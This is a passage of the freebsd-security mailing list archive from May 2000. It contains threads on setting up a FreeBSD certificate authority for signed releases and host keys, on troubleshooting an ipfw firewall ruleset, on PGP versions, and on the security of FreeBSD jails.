> employees, does this. People who install the ``latest and greatest'' >> > browser from wherever don't get support.) >> >> We could implement this without too much trouble by shipping the root cert >> on CD with FreeBSD releases (and having some kind of online distribution >> method, perhaps signed by a bunch of PGP keys) and instructing people on >> how to load it into netscape (if it were to be used for https purposes). >> Perhaps we could even make the netscape port pre-load it - we already have >> the infrastructure for customizing netscape prior to use. > Browsers are equipped to download new CA certs and install them in the database. Netscape and MS do it differently, of course, so (at least) two formats must be provided. Grabees must be confident of the site from which the cert is obtained, of course. > The typical cheap-skate response to other CA's being expensive is to get > an SSL cert from Thawte or Verisign, and distributed your certs via a web > ste hosted using that well-known CA. You don't get the automated cert > evaluation, but can provide a trusted path for cert retrieval. > Are you talking about a server cert here? That would allow securely distributing your own CA cert (as mentioned above), but doesn't give you any signing capability. I'm not sure what you mean by "automated cert evaluation". > In a prior e-mail, someone raised that doing a full secure facility is not > necessary given the size of the project. It's useful to understand who > will be relying on these keys as a means of evaluating the need for doing > the "CA" thing properly: > > 1) Is it just the committers? (small community that can forgive mistakes) > 2) Is it committers + developers? (larger and less forgiving community) > 3) Is it the general user population? (extrmely large community with their > jobs and businesses on the line) > > In addition, how will the certs be used? > > 1) For manual verification and retrieval only? > 2) For automated installation of security patches? > Those are some good questions; there are lots more. The first step, as you all know, to designing any system is to decide exactly what the system is to do. Will the certs be used for SSL only? Will they be used for signing? How many levels of certificate will you need? You will need some specific policies and a Certificate Practice Statement to go along with them (look at Verisign's CPS some time). Entrust used to have some good white papers describing some of the issues involved in setting up a CA and the responsibilities of a CA--I think the good ones are mostly gone now. You need to think about archiving, possibly for decades. How many people does it take to exercise the signing key? How much confidence can users expect to place in certs you've signed? What will you do if a cert is compromised? What will you do if your signing key is compromised. Do you have a secure vault to lock up the keys and the signing engine (most CAs do just that)? A secure repository for certificates? Will your CA sign the keys of subservient CAs? What about auditing (who, how often)? Certificate revocation? Will your certs support non-repudiation? What process will be used to validate the identity of the applicant (at each level of certificate)? Key management? What happens when a user's cert expires? How easy (hard, reliable) will it be to renew? What key sizes will you support? What key size will you use for your signing key. You can punt many of these issues by becoming a Registration Authority for an existing CA (e.g Verisign's Onsite program). If you do, you relinquish some of the advantages of running your own CA (e.g Quality of Service, Reliability, Control). Either way, you'll pay per certificate, either a one-time per cert royalty or a per-cert fee. Commercial software works that way (and low volume fees aren't cheap, in my estimation). How long will the fight over the use of Java and/or JavaScript in the CA system last, and how many friends will it alienate. You *really* need to have your ducks in a row if you're going to establish an X509 CA. None of this is intended to discourage the effort--I'm a long-time proponent of the use of public/private key cryptography as an aid to authentication. X509 certs are the most likely way to get there at this point (but I've been assming that for 4 years, and *nobody* is signing documents--or even applets-- online yet. How many people do you know who have client certs, even to access their bank acount, or their company 401k? They're still using PIN numbers, for G* sake. There may be better ways for small (say, less than a million participant) open-source groups to do roughly what is implied by the conversation I've seen so far, but X509 will work if you're willing to pay the freight. > My assertion is that if we begin distributing software in a signed way, we > need to do it right. This means signing all release announcements, > signing md5 checksum sets over releases, signing security updates that can > be installed using a binary installer, etc. > > We also need to understand that in more and more places, digital > signatures now have legal connotations. Are we accepting more > responsibility by signing things in these places? Do we become more > liable? Hopefully the answer on this front is no, but it is important > that we be sure. ... Digital signature have always had legal implications; it's just that nobody knew just what they were. Check that...nobody *knows* just what they are. It's possible to deduce logically what the implications are, and to prepare elaborate Certificate Practice Statements outlining the responsibility you're willing to accept, but no one has ever accused the US court system of elaborate concern for logic (sorry, I have no data for the rest of the world). To the best of my knowledge (and I've been watching for 3 or 4 years) there has never been a court case regarding certificates which might even *begin* to illuminate the position courts will take on relevant issues (anywhere in the world). The ABA does have guidelines (and some state bars are issuing certs themselves), and several states have CA licensing laws (Utah, California, Washington, that I can think of, and others). Some states have "electronic signature" laws which do little more than confuse the situration. The US Congres is of course bickering slowly over the topic. McBride, Baker and Coles (a law firm) have a page which has been tracking these issues in the US for years: http://www.mbc.com/ecommerce.html There are also links to information for many other countries. > ... Similarly, if we start signing things, people will > assume they can have greater confidence when installing over the network, > et al. Is this true? > > Robert N M Watson > Presumably, they will have as much confidence as the CPS says they can have. You *have* read Verisign's CPS, haven't you? Here's the URL to Entrust's papers on the topic--there are still a few useful ones, if you have time to paw through lots of PDFs: http://www.entrust.com/resourcecenter/whitepapers.htm Here are URLs to some CAs that have sprung up in Utah (and one in Washington) since their Digital Signature laws were passed. They may be informative. (Verisign and Thawte aren't the only games in town.) http://www.arcanvs.com/ http://www.usertrust.com/ http://www.digsigtrust.com/ http://www.caserver.com/ (Houston, we have a CA) http://www.idcertify.com/ (Seattle) http://www.cost.se/ca_int22.htm (ok, this is not Utah...) (I take no responsibility for URLs which point to MicroSoftHeaded servers) Note that some (most?) of these offer links which will allow you to install their CA cert in your browser CA database. IMHO, you're asking the right sort of questions. Ask more of them. -------------- Duane H. Hesser dhh@androcles.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 0:55:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 8DC1F37B511; Thu, 18 May 2000 00:55:37 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id BAA15259; Thu, 18 May 2000 01:55:11 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3923A26C.2E61D1E1@softweyr.com> Date: Thu, 18 May 2000 01:57:32 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman Cc: Kris Kennaway , Robert Watson , Peter Wemm , security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! References: <200005171951.PAA15001@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > On Wed, 17 May 2000, Robert Watson wrote: > > >> I do agree that we need to do a CA, but as I've mentioned before, we need > >> to do it *right* or not at all. This means a secure key storage > >> mechanism/facility, offline signing key, etc, etc. Rather than grow our > >> own, it might be easier (and more affordable) to sit on someone else's, > >> unless BSDi has one already? > > > Agreed. > > I think it's important to consider that the level of effort required > to implement maximal assurance may not necessarily be appropriate for > this project. (It certainly isn't appropriate for my organization, > and we have 500 people on staff and 6 people working full-time on > {sys,net}admin.) Right. Our needs are relatively simple: o Generate and keep safe a CA key. o Sign a certificate request for each committer. o Generate and keep safe a certificate for each "hat". o Be able to transfer certificates from one person to another when a new head fills a "hat". > >> Does anyone know anything about inter-cert-format certification? > >> I.e., can an x.509 PKI root sign PGP keys in a useful way? Is it > >> usefully verifiable in an automated way? > > > In principle this can be done by extracting a PGP key from the X.509 > > certificate since (AFAIK) it contains (can contain) all of the required > > bits. I'm not sure if something more direct has been standardized, though. > > It would be much easier to simply use an X.509 object signing tool to > sign the canonicalized PGP key, and vice versa. Or, alternatively, > dispense with one of the technologies entirely. X.509 for > privacy-enhanced mail appears to be effectively dead, and has been for > some time. There is a lot more than email to be considered here. New SSH keys for freefall could be much more easily posted on a secure web page than emailed to the whole world. A simple email indicating the URL of the page would provide notice. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 0:59:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6491737B8AC; Thu, 18 May 2000 00:59:24 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id BAA15273; Thu, 18 May 2000 01:59:23 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3923A366.A309CED9@softweyr.com> Date: Thu, 18 May 2000 02:01:44 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Wed, 17 May 2000, Wes Peters wrote: > > > > Now to address Wes's point: I don't believe SSH1 can do certification, > > > although I don't know about SSH2. > > > > Oh, I was referrering to certificates for sending S/MIME email. > > In theory PKI can do everything [*]: S/MIME email, PGP signatures, signed > SSH hostkeys so you don't have to explicitly verify the new key through > out-of-band trusted channels, SSL certificates for secure web services, > etc. In theory these formats should all be pretty inter-convertible, since > they all contain "enough crypto" (packaged in different ways) to make a > decent protocol happy. > > > I'm not sure we'll be doing a large enough volume to warrant paying money > > for CA services. I guess we'd have to work out a plan for what classes > > of persons and/or positions we plan to issue keys/certs to in order to > > answer that question. If we're talking about a CA cert, a cert for each > > of the "hats", and a cert for each committer individually, that means > > right now we'd need to manage about 210 certs, of which 5 or 6 need to > > be transferrable. > > The point of a PKI is that you can have a *single* trusted root > certificate with all others signed by that one in a hierarchy. In order to > root the tree in something which (e.g.) Netscape browsers will > automatically understand, we'd need to have at least one key signed by a > commercial CA (Verisign, Thawte, ..) which is used as the basis for the > FreeBSD PKI, but there's no inherent need for more than one "purchased" > certificate. It is quite simple to add a CA to your browser, I've done it at work several times this week. ;^) Also, there is more than just the browser at stake here; when I finish my work on pkg_add it will be able to accept and verify signed packages. How much checking of the certificate we choose to do is up for grabs. > > Plus, I really like the idea of a cert with "The FreeBSD Project" as the > > CA. Are we not the most reliable source of information about FreeBSD? > > Certified signatures are not about verifying the information content of > data, it's about verifying the integrity of the message and the > authenticity of the signing key. Exactly. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 1: 2:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 36DF737B511; Thu, 18 May 2000 01:02:10 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id CAA15364; Thu, 18 May 2000 02:02:10 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3923A40E.904210F3@softweyr.com> Date: Thu, 18 May 2000 02:04:30 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Garrett Wollman , security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > We could implement this without too much trouble by shipping the root cert > on CD with FreeBSD releases (and having some kind of online distribution > method, perhaps signed by a bunch of PGP keys) and instructing people on > how to load it into netscape (if it were to be used for https purposes). > Perhaps we could even make the netscape port pre-load it - we already have > the infrastructure for customizing netscape prior to use. Now you're talking. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 6:11:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from alpha.root-servers.ch (alpha.root-servers.ch [195.49.62.125]) by hub.freebsd.org (Postfix) with SMTP id 97D5F37BDD6 for ; Thu, 18 May 2000 06:11:27 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch) Received: (qmail 13212 invoked from network); 18 May 2000 13:13:17 -0000 Received: from unknown (HELO ATHLON-550) (62.2.99.59) by ns1.root-servers.ch with SMTP; 18 May 2000 13:13:17 -0000 Date: Thu, 18 May 2000 15:12:05 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.42 Beta/19) UNREG / CD5BF9353B3B7091 Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <1574492519.20000518151205@buz.ch> To: freebsd-security@freebsd.org Subject: ipfw: HTTP(S) is working but everything else doesn't... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [I sent this already to -questions but it kept unanswered. I surely know how mls are working but some advice couldn't hurt ;-)] Hello, my ipfw is driving me nuts. I want to allow SMTP (both incoming and outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well but that one has got it's own problems because of that FTP-data thingy) for the firewall box itself and all boxes which use it as gateway [1]. Everything beside this should be rejected. To accomplish this, I wanted to use the following ruleset: 00100 allow ip from any to any via lo0 00200 deny ip from any to 127.0.0.0/8 00300 allow tcp from any to any established 00400 allow ip from any to any frag 00500 allow tcp from any to any 25 setup 00600 allow udp from any to any 53 00700 allow udp from any 53 to any 53 00800 allow tcp from any to any 80 setup 00900 allow tcp from any to any 443 setup 01000 allow tcp from any to any 21 setup 01100 allow tcp from any to any 110 setup 01200 allow tcp from any to any 22 setup 01300 allow udp from any to any 22 # DHCP, I need this during development phase, it's going to be kicked out in production 01400 allow tcp from any to any 546 setup 01500 allow udp from any to any 546 65535 deny ip from any to any but this isn't working as expected. HTTP and HTTPS both work as they should. DNS doesn't work at all, neither SMTP nor POP (meaning: I can't connect to the server from outside or to outside servers from the box itself). And the most strange thing (or atleast does this seem to me this way) is happening with ssh: first, ssh (PuTTY) takes over a minute to show me a login prompt (connecting to the box from outside) and then, when I try to login, I can type without any problems, but as soon as I hit enter, the ssh client exits and the server reports |sshd[645]: fatal: Timeout before authentication for 10.2.2.150. What's going on wrong here? [1] Meaning the box acts as some kind of bastion host for the entire net behind it. I know this isn't the optimum but as we can't setup enough of those boxes (supplier ran out of them :-(( it has to offer those services as well. Best regards, Gabriel Best regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 6:27:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail3.iadfw.net (mail3.iadfw.net [209.196.123.3]) by hub.freebsd.org (Postfix) with SMTP id 3C28237B654 for ; Thu, 18 May 2000 06:27:18 -0700 (PDT) (envelope-from moby@pcsn.net) Received: from mobster1 from [205.241.160.67] by mail3.iadfw.net (/\##/\ Smail3.1.30.16 #30.4) with smtp for sender: id ; Thu, 18 May 2000 08:27:11 -0500 (CDT) Reply-To: From: "Mobeen Azhar" To: Subject: RE: ipfw: HTTP(S) is working but everything else doesn't... Date: Thu, 18 May 2000 08:27:06 -0500 Message-ID: <000501bfc0cc$c2b3ae00$9ef105ab@TexasCommerce.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <1574492519.20000518151205@buz.ch> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am not exactly sure what's going wrong, but try removing the deny ip from any to 127.0.0.0/8 rule and see what happens. Also, in the beginning of your rules, you need to allow all local traffic. I don't see anything like that in your rules. --Moby > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Gabriel Ambuehl > Sent: Thursday, May 18, 2000 0812 > To: freebsd-security@FreeBSD.ORG > Subject: ipfw: HTTP(S) is working but everything else doesn't... > > > [I sent this already to -questions but it kept unanswered. I surely > know how mls are working but some advice couldn't hurt ;-)] > Hello, > my ipfw is driving me nuts. I want to allow SMTP (both incoming and > outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well > but that one has got it's own problems because of that FTP-data thingy) > for the firewall box itself and all boxes which use it as gateway [1]. > Everything beside this should be rejected. To accomplish this, I > wanted to use the following ruleset: > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 allow tcp from any to any established > 00400 allow ip from any to any frag > 00500 allow tcp from any to any 25 setup > 00600 allow udp from any to any 53 > 00700 allow udp from any 53 to any 53 > 00800 allow tcp from any to any 80 setup > 00900 allow tcp from any to any 443 setup > 01000 allow tcp from any to any 21 setup > 01100 allow tcp from any to any 110 setup > 01200 allow tcp from any to any 22 setup > 01300 allow udp from any to any 22 > # DHCP, I need this during development phase, it's going to be > kicked out in production > 01400 allow tcp from any to any 546 setup > 01500 allow udp from any to any 546 > 65535 deny ip from any to any > > but this isn't working as expected. HTTP and HTTPS both work as they > should. DNS doesn't work at all, neither SMTP nor POP (meaning: I > can't connect to the server from outside or to outside servers from > the box itself). And the most strange thing (or atleast does this seem > to me this way) is happening with ssh: first, ssh (PuTTY) takes > over a minute > to show me a login prompt (connecting to the box from outside) and > then, when I try to login, I can type without any problems, but as > soon as I hit enter, the ssh client exits and the server reports > |sshd[645]: fatal: Timeout before authentication for 10.2.2.150. > What's going on wrong here? > > [1] Meaning the box acts as some kind of bastion host for the entire > net behind it. I know this isn't the optimum but as we can't setup enough > of those boxes (supplier ran out of them :-(( it has to offer those > services as well. > > > Best regards, > Gabriel > > > > > Best regards, > Gabriel > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 6:43:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 2CD6E37B69C for ; Thu, 18 May 2000 06:43:26 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id KAA22457; Thu, 18 May 2000 10:35:46 -0300 (GMT) From: Fernando Schapachnik Message-Id: <200005181335.KAA22457@ns1.via-net-works.net.ar> Subject: Re: ipfw: HTTP(S) is working but everything else doesn't... In-Reply-To: <1574492519.20000518151205@buz.ch> from Gabriel Ambuehl at "May 18, 0 03:12:05 pm" To: gabriel_ambuehl@buz.ch (Gabriel Ambuehl) Date: Thu, 18 May 2000 10:35:46 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Gabriel Ambuehl escribió: > my ipfw is driving me nuts. I want to allow SMTP (both incoming and > outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well > but that one has got it's own problems because of that FTP-data thingy) > for the firewall box itself and all boxes which use it as gateway [1]. You can try tcpdumping the interfaces to see what you get. Also, you can try adding a deny log rule at the bottom to see what gets dropped by the firewall. Good luck! Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7: 5: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 003EB37BC69 for ; Thu, 18 May 2000 07:04:56 -0700 (PDT) (envelope-from vlad@sandy.ru) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1) with ESMTP id RAA09067; Thu, 18 May 2000 17:50:27 +0400 (MSD) Date: Thu, 18 May 2000 17:50:29 +0400 From: Vladimir Dubrovin X-Mailer: The Bat! (v1.41) Reply-To: Vladimir Dubrovin Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <11743.000518@sandy.ru> To: Gabriel Ambuehl Cc: freebsd-security@freebsd.org Subject: Re: ipfw: HTTP(S) is working but everything else doesn't... In-reply-To: <1574492519.20000518151205@buz.ch> References: <1574492519.20000518151205@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Gabriel Ambuehl, You've missed allow udp from any 53 to any same thing with other UDP's In fact it's better configure allow udp from any 1024-65535,53 to any 53 allow udp from any 53 to any 1024-65535 because otherwise all your network is opened from any UDP attack with source port 53. 18.05.00 17:12, you wrote: ipfw: HTTP(S) is working but everything else doesn't...; G> [I sent this already to -questions but it kept unanswered. I surely G> know how mls are working but some advice couldn't hurt ;-)] G> Hello, G> my ipfw is driving me nuts. I want to allow SMTP (both incoming and G> outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well G> but that one has got it's own problems because of that FTP-data thingy) G> for the firewall box itself and all boxes which use it as gateway [1]. G> Everything beside this should be rejected. To accomplish this, I G> wanted to use the following ruleset: G> 00100 allow ip from any to any via lo0 G> 00200 deny ip from any to 127.0.0.0/8 G> 00300 allow tcp from any to any established G> 00400 allow ip from any to any frag G> 00500 allow tcp from any to any 25 setup G> 00600 allow udp from any to any 53 G> 00700 allow udp from any 53 to any 53 G> 00800 allow tcp from any to any 80 setup G> 00900 allow tcp from any to any 443 setup G> 01000 allow tcp from any to any 21 setup G> 01100 allow tcp from any to any 110 setup G> 01200 allow tcp from any to any 22 setup G> 01300 allow udp from any to any 22 G> # DHCP, I need this during development phase, it's going to be kicked out in production G> 01400 allow tcp from any to any 546 setup G> 01500 allow udp from any to any 546 G> 65535 deny ip from any to any G> but this isn't working as expected. HTTP and HTTPS both work as they G> should. DNS doesn't work at all, neither SMTP nor POP (meaning: I G> can't connect to the server from outside or to outside servers from G> the box itself). And the most strange thing (or atleast does this seem G> to me this way) is happening with ssh: first, ssh (PuTTY) takes over a minute G> to show me a login prompt (connecting to the box from outside) and G> then, when I try to login, I can type without any problems, but as G> soon as I hit enter, the ssh client exits and the server reports G> |sshd[645]: fatal: Timeout before authentication for 10.2.2.150. G> What's going on wrong here? G> [1] Meaning the box acts as some kind of bastion host for the entire G> net behind it. I know this isn't the optimum but as we can't setup enough G> of those boxes (supplier ran out of them :-(( it has to offer those G> services as well. G> Best regards, G> Gabriel G> Best regards, G> Gabriel G> To Unsubscribe: send mail to majordomo@FreeBSD.org G> with "unsubscribe freebsd-security" in the body of the message +=-=-=-=-=-=-=-=-=+ |Vladimir Dubrovin| Sandy, ISP | Sandy CSS chief | Customers Support Service dept http://www.sandy.ru Nizhny Novgorod, Russia +=-=-=-=-=-=-=-=-=+ http://www.security.nnov.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:28:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from vidle.i.cz (vidle.i.cz [193.179.36.138]) by hub.freebsd.org (Postfix) with ESMTP id C650537BEED for ; Thu, 18 May 2000 07:28:26 -0700 (PDT) (envelope-from mm@i.cz) Received: from ns.i.cz (brana.i.cz [193.179.36.134]) by vidle.i.cz (Postfix) with ESMTP id 304D630743 for ; Thu, 18 May 2000 15:07:03 +0200 (CEST) Received: from woody.i.cz (woody.i.cz [192.168.18.29]) by ns.i.cz (Postfix) with ESMTP id 6FB5F36405 for ; Thu, 18 May 2000 15:04:22 +0200 (CEST) Content-Length: 424 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <200005171951.PAA15001@khavrinen.lcs.mit.edu> Date: Thu, 18 May 2000 15:04:22 +0200 (MET DST) Reply-To: mm@i.cz From: Martin Machacek To: security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 17-May-00 Garrett Wollman wrote: > Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so > they really don't care whether the commercial product exists or not. > I use GnuPG, personally, since then I don't have to worry about any > licensing issues at all. I'm using Linux version of PGP 6.5.2 on FreeBSD 3.3 without any problems. Maybe that's another reason ... Martin --- [PGP KeyID F3F409C4] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:39:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 275D737B69F for ; Thu, 18 May 2000 07:39:10 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id KAA64312; Thu, 18 May 2000 10:39:00 -0400 (EDT) (envelope-from cjc) Date: Thu, 18 May 2000 10:39:00 -0400 From: "Crist J. Clark" To: Gabriel Ambuehl Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw: HTTP(S) is working but everything else doesn't... Message-ID: <20000518103900.A64244@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <1574492519.20000518151205@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <1574492519.20000518151205@buz.ch>; from gabriel_ambuehl@buz.ch on Thu, May 18, 2000 at 03:12:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 18, 2000 at 03:12:05PM +0200, Gabriel Ambuehl wrote: > [I sent this already to -questions but it kept unanswered. I surely > know how mls are working but some advice couldn't hurt ;-)] > Hello, > my ipfw is driving me nuts. I want to allow SMTP (both incoming and > outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well > but that one has got it's own problems because of that FTP-data thingy) > for the firewall box itself and all boxes which use it as gateway [1]. > Everything beside this should be rejected. To accomplish this, I > wanted to use the following ruleset: > 00100 allow ip from any to any via lo0 > 00200 deny ip from any to 127.0.0.0/8 > 00300 allow tcp from any to any established > 00400 allow ip from any to any frag > 00500 allow tcp from any to any 25 setup > 00600 allow udp from any to any 53 > 00700 allow udp from any 53 to any 53 > 00800 allow tcp from any to any 80 setup > 00900 allow tcp from any to any 443 setup > 01000 allow tcp from any to any 21 setup > 01100 allow tcp from any to any 110 setup > 01200 allow tcp from any to any 22 setup > 01300 allow udp from any to any 22 > # DHCP, I need this during development phase, it's going to be kicked out in production > 01400 allow tcp from any to any 546 setup > 01500 allow udp from any to any 546 > 65535 deny ip from any to any > > but this isn't working as expected. HTTP and HTTPS both work as they > should. DNS doesn't work at all, neither SMTP nor POP (meaning: I > can't connect to the server from outside or to outside servers from > the box itself). And the most strange thing (or atleast does this seem > to me this way) is happening with ssh: first, ssh (PuTTY) takes over a minute > to show me a login prompt (connecting to the box from outside) and > then, when I try to login, I can type without any problems, but as > soon as I hit enter, the ssh client exits and the server reports > |sshd[645]: fatal: Timeout before authentication for 10.2.2.150. ^^^^^^^^^^ I doubt this is the problem, but I just want to check. Is this gateway also doing NAT? > What's going on wrong here? Try the suggestion of logging some of those rules. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:41: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5993737B6E7 for ; Thu, 18 May 2000 07:40:59 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA29187; Thu, 18 May 2000 10:40:40 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 10:40:39 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Don Lewis Cc: Geoffrey Robinson , security@FreeBSD.ORG Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: <200005172153.OAA01533@salsa.gv.tsc.tdk.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Don Lewis wrote: > On May 16, 1:05pm, Robert Watson wrote: > > ... > > } > Finally how secure is jail really? I'm aware of a trivial chroot breakout > } > technique. Does that hole still exist? Are there any other known holes? Is > } > jail still under active development? Is it worth the trouble to do any of > } > this? > > } Right now my efforts are primarily aimed at improving the security > } abstractions within 